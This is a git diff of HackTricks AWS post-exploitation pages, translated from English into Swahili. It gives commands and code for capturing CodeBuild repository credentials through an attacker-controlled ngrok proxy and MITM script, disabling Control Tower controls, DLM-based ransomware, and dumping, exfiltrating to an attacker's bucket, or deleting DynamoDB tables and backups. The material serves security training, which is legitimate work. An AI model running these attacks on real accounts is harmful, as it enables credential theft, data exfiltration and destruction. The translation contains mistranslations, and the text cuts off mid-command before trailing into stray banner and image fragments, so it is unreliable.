@@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
# Start the build
aws codebuild start-build --project-name my-project2
```
-
### Via insecureSSL
-**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
-Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
-
-- First you need to enumerate the current configuration with something like:
+**Codebuild** miradi ina mipangilio inayoitwa **`insecureSsl`** ambayo imefichwa kwenye wavuti unaweza kubadilisha tu kutoka kwa API.\
+Kuwezesha hili, inaruhusu Codebuild kuungana na hifadhi **bila kuangalia cheti** kinachotolewa na jukwaa.
+- Kwanza unahitaji kuorodhesha usanidi wa sasa kwa kutumia kitu kama:
```bash
aws codebuild batch-get-projects --name
```
-
-- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
- - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:
-
+- Kisha, kwa taarifa ulizokusanya unaweza kuboresha mipangilio ya mradi **`insecureSsl`** kuwa **`True`**. Ifuatayo ni mfano wa jinsi nilivyoboresha mradi, angalia **`insecureSsl=True`** mwishoni (hii ndiyo kitu pekee unachohitaji kubadilisha kutoka kwenye usanidi ulio kusanya).
+- Zaidi ya hayo, ongeza pia mabadiliko ya mazingira **http_proxy** na **https_proxy** yanayoelekeza kwenye tcp ngrok yako kama:
```bash
aws codebuild update-project --name \
- --source '{
- "type": "GITHUB",
- "location": "https://github.com/carlospolop/404checker",
- "gitCloneDepth": 1,
- "gitSubmodulesConfig": {
- "fetchSubmodules": false
- },
- "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
- "auth": {
- "type": "CODECONNECTIONS",
- "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
- },
- "reportBuildStatus": false,
- "insecureSsl": true
- }' \
- --environment '{
- "type": "LINUX_CONTAINER",
- "image": "aws/codebuild/standard:5.0",
- "computeType": "BUILD_GENERAL1_SMALL",
- "environmentVariables": [
- {
- "name": "http_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- },
- {
- "name": "https_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- }
- ]
- }'
+--source '{
+"type": "GITHUB",
+"location": "https://github.com/carlospolop/404checker",
+"gitCloneDepth": 1,
+"gitSubmodulesConfig": {
+"fetchSubmodules": false
+},
+"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
+"auth": {
+"type": "CODECONNECTIONS",
+"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
+},
+"reportBuildStatus": false,
+"insecureSsl": true
+}' \
+--environment '{
+"type": "LINUX_CONTAINER",
+"image": "aws/codebuild/standard:5.0",
+"computeType": "BUILD_GENERAL1_SMALL",
+"environmentVariables": [
+{
+"name": "http_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+},
+{
+"name": "https_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+}
+]
+}'
```
-
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Kisha,endesha mfano wa msingi kutoka [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) katika bandari iliyoonyeshwa na mabadiliko ya proxy (http_proxy na https_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
- host="127.0.0.1",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
+host="127.0.0.1",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
-
-- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Hatimaye, bonyeza **Jenga mradi**, **vithibitisho** vitatumwa kwa **maandishi wazi** (base64) kwenye bandari ya mitm:
-### ~~Via HTTP protocol~~
+### ~~Kupitia itifaki ya HTTP~~
-> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+> [!TIP] > **Ukatili huu ulirekebishwa na AWS wakati fulani katika wiki ya 20 ya Februari ya 2023 (nadhani Ijumaa). Hivyo, mshambuliaji hawezi kuutumia tena :)**
-An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+Mshambuliaji mwenye **idhini za juu katika CodeBuild anaweza kuvuja token ya Github/Bitbucket** iliyowekwa au ikiwa idhini ilipangwa kupitia OAuth, **token ya muda ya OAuth inayotumika kufikia msimbo**.
-- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
+- Mshambuliaji anaweza kuongeza mabadiliko ya mazingira **http_proxy** na **https_proxy** kwenye mradi wa CodeBuild ukielekeza kwenye mashine yake (kwa mfano `http://5.tcp.eu.ngrok.io:14972`).
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Kisha, badilisha URL ya repo ya github kutumia HTTP badala ya HTTPS, kwa mfano: `http://github.com/carlospolop-forks/TestActions`
+- Kisha, endesha mfano wa msingi kutoka [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) kwenye bandari iliyotajwa na mabadiliko ya proxy (http_proxy na https_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
- host="0.0.0.0",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
+host="0.0.0.0",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
-
-- Next, click on **Build the project** or start the build from command line:
-
+- Kisha, bonyeza **Build the project** au anza ujenzi kutoka kwa mstari wa amri:
```sh
aws codebuild start-build --project-name
```
-
-- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Hatimaye, **credentials** zitatumwa kwa **clear text** (base64) kwenye bandari ya mitm:
> [!WARNING]
-> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
+> Sasa mshambuliaji ataweza kutumia token kutoka kwa mashine yake, kuorodhesha haki zote alizo nazo na (ku)zitumia kwa urahisi zaidi kuliko kutumia huduma ya CodeBuild moja kwa moja.
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
index f1c6fb394..dd9041283 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
@@ -8,17 +8,11 @@
../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
{{#endref}}
-### Enable / Disable Controls
-
-To further exploit an account, you might need to disable/enable Control Tower controls:
+### Wezesha / Zima Mifumo
+Ili kuendelea kutumia akaunti, unaweza kuhitaji kuzima/kuwezesha mifumo ya Control Tower:
```bash
aws controltower disable-control --control-identifier --target-identifier
aws controltower enable-control --control-identifier --target-identifier
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
index baa309e53..e9b4dfbe4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -6,94 +6,86 @@
### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
-A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+Shambulio la ransomware linaweza kutekelezwa kwa kuficha kiasi cha EBS volumes kadri iwezekanavyo na kisha kufuta EC2 instances, EBS volumes, na snapshots za sasa. Ili kuendesha shughuli hii mbaya, mtu anaweza kutumia Amazon DLM, akificha snapshots kwa kutumia funguo za KMS kutoka akaunti nyingine ya AWS na kuhamasisha snapshots zilizofichwa kwa akaunti tofauti. Vinginevyo, wanaweza kuhamasisha snapshots bila kuficha kwa akaunti wanayosimamia na kisha kuzificha huko. Ingawa si rahisi kuficha EBS volumes au snapshots zilizopo moja kwa moja, inawezekana kufanya hivyo kwa kuunda volume au snapshot mpya.
-Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+Kwanza, mtu atatumia amri kukusanya taarifa kuhusu volumes, kama vile ID ya instance, ID ya volume, hali ya ufichaji, hali ya kiambatisho, na aina ya volume.
`aws ec2 describe-volumes`
-Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
-
+Pili, mtu ataunda sera ya mzunguko wa maisha. Amri hii inatumia DLM API kuanzisha sera ya mzunguko wa maisha ambayo inachukua snapshots za kila siku za volumes zilizotajwa kwa wakati ulioainishwa. Pia inatumia lebo maalum kwa snapshots na nakala za lebo kutoka kwa volumes hadi snapshots. Faili ya policyDetails.json inajumuisha maelezo ya sera ya mzunguko wa maisha, kama vile lebo za lengo, ratiba, ARN ya funguo ya KMS ya hiari kwa ufichaji, na akaunti ya lengo kwa ajili ya kushiriki snapshots, ambayo itarekodiwa katika kumbukumbu za CloudTrail za mwathirika.
```bash
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
```
-
-A template for the policy document can be seen here:
-
+Template ya hati ya sera inaweza kuonekana hapa:
```bash
{
- "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
- "ResourceTypes": [
- "VOLUME"
- ],
- "TargetTags": [
- {
- "Key": "ExampleKey",
- "Value": "ExampleValue"
- }
- ],
- "Schedules": [
- {
- "Name": "DailySnapshots",
- "CopyTags": true,
- "TagsToAdd": [
- {
- "Key": "SnapshotCreator",
- "Value": "DLM"
- }
- ],
- "VariableTags": [
- {
- "Key": "CostCenter",
- "Value": "Finance"
- }
- ],
- "CreateRule": {
- "Interval": 24,
- "IntervalUnit": "HOURS",
- "Times": [
- "03:00"
- ]
- },
- "RetainRule": {
- "Count": 14
- },
- "FastRestoreRule": {
- "Count": 2,
- "Interval": 12,
- "IntervalUnit": "HOURS"
- },
- "CrossRegionCopyRules": [
- {
- "TargetRegion": "us-west-2",
- "Encrypted": true,
- "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
- "CopyTags": true,
- "RetainRule": {
- "Interval": 1,
- "IntervalUnit": "DAYS"
- }
- }
- ],
- "ShareRules": [
- {
- "TargetAccounts": [
- "123456789012"
- ],
- "UnshareInterval": 30,
- "UnshareIntervalUnit": "DAYS"
- }
- ]
- }
- ],
- "Parameters": {
- "ExcludeBootVolume": false
- }
+"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+"ResourceTypes": [
+"VOLUME"
+],
+"TargetTags": [
+{
+"Key": "ExampleKey",
+"Value": "ExampleValue"
+}
+],
+"Schedules": [
+{
+"Name": "DailySnapshots",
+"CopyTags": true,
+"TagsToAdd": [
+{
+"Key": "SnapshotCreator",
+"Value": "DLM"
+}
+],
+"VariableTags": [
+{
+"Key": "CostCenter",
+"Value": "Finance"
+}
+],
+"CreateRule": {
+"Interval": 24,
+"IntervalUnit": "HOURS",
+"Times": [
+"03:00"
+]
+},
+"RetainRule": {
+"Count": 14
+},
+"FastRestoreRule": {
+"Count": 2,
+"Interval": 12,
+"IntervalUnit": "HOURS"
+},
+"CrossRegionCopyRules": [
+{
+"TargetRegion": "us-west-2",
+"Encrypted": true,
+"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+"CopyTags": true,
+"RetainRule": {
+"Interval": 1,
+"IntervalUnit": "DAYS"
+}
+}
+],
+"ShareRules": [
+{
+"TargetAccounts": [
+"123456789012"
+],
+"UnshareInterval": 30,
+"UnshareIntervalUnit": "DAYS"
+}
+]
+}
+],
+"Parameters": {
+"ExcludeBootVolume": false
+}
}
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
index d63689d9e..6e66066a8 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -4,7 +4,7 @@
## DynamoDB
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
### `dynamodb:BatchGetItem`
-An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
+Mshambuliaji mwenye ruhusa hii ataweza **kupata vitu kutoka kwa meza kwa ufunguo wa msingi** (huwezi tu kuomba data zote za meza). Hii inamaanisha kuwa unahitaji kujua funguo za msingi (unaweza kupata hii kwa kupata metadata ya meza (`describe-table`).
{{#tabs }}
{{#tab name="json file" }}
-
```bash
aws dynamodb batch-get-item --request-items file:///tmp/a.json
// With a.json
{
- "ProductCatalog" : { // This is the table name
- "Keys": [
- {
- "Id" : { // Primary keys name
- "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
- }
- }
- ]
- }
+"ProductCatalog" : { // This is the table name
+"Keys": [
+{
+"Id" : { // Primary keys name
+"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
+}
+}
+]
+}
}
```
-
{{#endtab }}
{{#tab name="inline" }}
-
```bash
aws dynamodb batch-get-item \
- --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
- --region
+--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:GetItem`
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
-
+**Kama ruhusa za awali** hii inamruhusu mshambuliaji mwenye uwezo kusoma thamani kutoka jedwali 1 tu kwa kutolewa kwa ufunguo wa msingi wa kipengee cha kupata:
```json
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json
// With a.json
{
"Id" : {
- "N": "205"
+"N": "205"
}
}
```
-
-With this permission it's also possible to use the **`transact-get-items`** method like:
-
+Na ruhusa hii, pia inawezekana kutumia njia ya **`transact-get-items`** kama:
```json
aws dynamodb transact-get-items \
- --transact-items file:///tmp/a.json
+--transact-items file:///tmp/a.json
// With a.json
[
- {
- "Get": {
- "Key": {
- "Id": {"N": "205"}
- },
- "TableName": "ProductCatalog"
- }
- }
+{
+"Get": {
+"Key": {
+"Id": {"N": "205"}
+},
+"TableName": "ProductCatalog"
+}
+}
]
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:Query`
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
+**Kama ruhusa za awali** hii inaruhusu mshambuliaji mwenye uwezo kusoma thamani kutoka jedwali 1 tu kwa kutumia ufunguo wa msingi wa kipengee kinachopaswa kupatikana. Inaruhusu kutumia [sehemu ya kulinganisha](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), lakini kulinganisha pekee linaloruhusiwa na ufunguo wa msingi (ambalo lazima lionekane) ni "EQ", hivyo huwezi kutumia kulinganisha kupata DB nzima katika ombi.
{{#tabs }}
{{#tab name="json file" }}
-
```bash
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
- // With a.json
- {
+// With a.json
+{
"Id" : {
- "ComparisonOperator":"EQ",
- "AttributeValueList": [ {"N": "205"} ]
- }
+"ComparisonOperator":"EQ",
+"AttributeValueList": [ {"N": "205"} ]
+}
}
```
-
{{#endtab }}
{{#tab name="inline" }}
-
```bash
aws dynamodb query \
- --table-name TargetTable \
- --key-condition-expression "AttributeName = :value" \
- --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
- --region
+--table-name TargetTable \
+--key-condition-expression "AttributeName = :value" \
+--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:Scan`
-You can use this permission to **dump the entire table easily**.
-
+Unaweza kutumia ruhusa hii **kutoa jedwali zima kwa urahisi**.
```bash
aws dynamodb scan --table-name #Get data inside the table
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:PartiQLSelect`
-You can use this permission to **dump the entire table easily**.
-
+Unaweza kutumia ruhusa hii **kutoa jedwali zima kwa urahisi**.
```bash
aws dynamodb execute-statement \
- --statement "SELECT * FROM ProductCatalog"
+--statement "SELECT * FROM ProductCatalog"
```
-
-This permission also allow to perform `batch-execute-statement` like:
-
+Hii ruhusa pia inaruhusu kutekeleza `batch-execute-statement` kama:
```bash
aws dynamodb batch-execute-statement \
- --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
+--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
```
+lakini unahitaji kubainisha ufunguo wa msingi na thamani, hivyo siyo faida sana.
-but you need to specify the primary key with a value, so it isn't that useful.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
-This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
-
+Ruhusa hii itamruhusu mshambuliaji **kutoa jedwali lote kwenye kikasha cha S3** alichokichagua:
```bash
aws dynamodb export-table-to-point-in-time \
- --table-arn arn:aws:dynamodb:::table/TargetTable \
- --s3-bucket \
- --s3-prefix \
- --export-time \
- --region
+--table-arn arn:aws:dynamodb:::table/TargetTable \
+--s3-bucket \
+--s3-prefix \
+--export-time \
+--region
```
-
-Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
-
+Kumbuka kwamba ili hii ifanye kazi, jedwali linahitaji kuwa na point-in-time-recovery iliyoanzishwa, unaweza kuangalia kama jedwali lina hiyo kwa:
```bash
aws dynamodb describe-continuous-backups \
- --table-name
+--table-name
```
-
-If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
-
+Ikiwa haijawashwa, utahitaji **kuwasha** na kwa hiyo unahitaji ruhusa **`dynamodb:ExportTableToPointInTime`**:
```bash
aws dynamodb update-continuous-backups \
- --table-name \
- --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
+--table-name \
+--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
-With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
-
+Kwa ruhusa hizi, mshambuliaji angeweza **kuunda jedwali jipya kutoka kwa nakala ya akiba** (au hata kuunda nakala ya akiba ili kisha aifufue katika jedwali tofauti). Kisha, kwa ruhusa zinazohitajika, angeweza kuangalia **taarifa** kutoka kwa akiba ambazo haziwezi kuwa tena katika jedwali la uzalishaji.
```bash
aws dynamodb restore-table-from-backup \
- --backup-arn \
- --target-table-name \
- --region
+--backup-arn \
+--target-table-name \
+--region
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
+**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika nakala ya meza
### `dynamodb:PutItem`
-This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
+Ruhusa hii inawawezesha watumiaji kuongeza **kitu kipya kwenye meza au kubadilisha kitu kilichopo** na kitu kipya. Ikiwa kitu chenye ufunguo wa msingi sawa tayari kipo, **kitu chote kitabadilishwa** na kitu kipya. Ikiwa ufunguo wa msingi haupo, kitu kipya chenye ufunguo wa msingi ulioainishwa kitaundwa **.**
{{#tabs }}
{{#tab name="XSS Example" }}
-
```bash
## Create new item with XSS payload
aws dynamodb put-item --table --item file://add.json
### With add.json:
{
- "Id": {
- "S": "1000"
- },
- "Name": {
- "S": "Marc"
- },
- "Description": {
- "S": ""
- }
+"Id": {
+"S": "1000"
+},
+"Name": {
+"S": "Marc"
+},
+"Description": {
+"S": ""
+}
}
```
-
{{#endtab }}
{{#tab name="AI Example" }}
-
```bash
aws dynamodb put-item \
- --table-name ExampleTable \
- --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
- --region
+--table-name ExampleTable \
+--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Madhara Yanayoweza Kutokea:** Ukatili wa udhaifu zaidi/kuvunjika kwa sheria kwa kuwa na uwezo wa kuongeza/kubadilisha data katika jedwali la DynamoDB
### `dynamodb:UpdateItem`
-This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
+Ruhusa hii inawaruhusu watumiaji **kubadilisha sifa zilizopo za kipengee au kuongeza sifa mpya kwa kipengee**. Haifanyi **mabadiliko** ya kipengee chote; inasasisha tu sifa zilizotajwa. Ikiwa funguo kuu haipo katika jedwali, operesheni itafanya **kuunda kipengee kipya** chenye funguo kuu iliyotajwa na kuweka sifa zilizotajwa katika muktadha wa sasisho.
{{#tabs }}
{{#tab name="XSS Example" }}
-
```bash
## Update item with XSS payload
aws dynamodb update-item --table \
- --key file://key.json --update-expression "SET Description = :value" \
- --expression-attribute-values file://val.json
+--key file://key.json --update-expression "SET Description = :value" \
+--expression-attribute-values file://val.json
### With key.json:
{
- "Id": {
- "S": "1000"
- }
+"Id": {
+"S": "1000"
+}
}
### and val.json
{
- ":value": {
- "S": ""
- }
+":value": {
+"S": ""
+}
}
```
-
{{#endtab }}
{{#tab name="AI Example" }}
-
```bash
aws dynamodb update-item \
- --table-name ExampleTable \
- --key '{"Id": {"S": "1"}}' \
- --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
- --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
- --region
+--table-name ExampleTable \
+--key '{"Id": {"S": "1"}}' \
+--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
+--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Madhara Yanayoweza Kutokea:** Kutumiwa kwa udhaifu/kuvunjwa zaidi kwa kuwa na uwezo wa kuongeza/kubadilisha data katika jedwali la DynamoDB
### `dynamodb:DeleteTable`
-An attacker with this permission can **delete a DynamoDB table, causing data loss**.
-
+Mshambuliaji mwenye ruhusa hii anaweza **kufuta jedwali la DynamoDB, na kusababisha kupoteza data**.
```bash
aws dynamodb delete-table \
- --table-name TargetTable \
- --region
+--table-name TargetTable \
+--region
```
-
-**Potential impact**: Data loss and disruption of services relying on the deleted table.
+**Madhara yanayoweza kutokea**: Kupoteza data na kuingiliwa kwa huduma zinazotegemea meza iliyofutwa.
### `dynamodb:DeleteBackup`
-An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
-
+Mshambuliaji mwenye ruhusa hii anaweza **kufuta nakala ya akiba ya DynamoDB, ambayo inaweza kusababisha kupoteza data katika hali ya kuokoa dharura**.
```bash
aws dynamodb delete-backup \
- --backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \
- --region
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte).png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
 (1) (1) (1) (1) (1).png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
 (1).png)
.png)
.png)
.png)
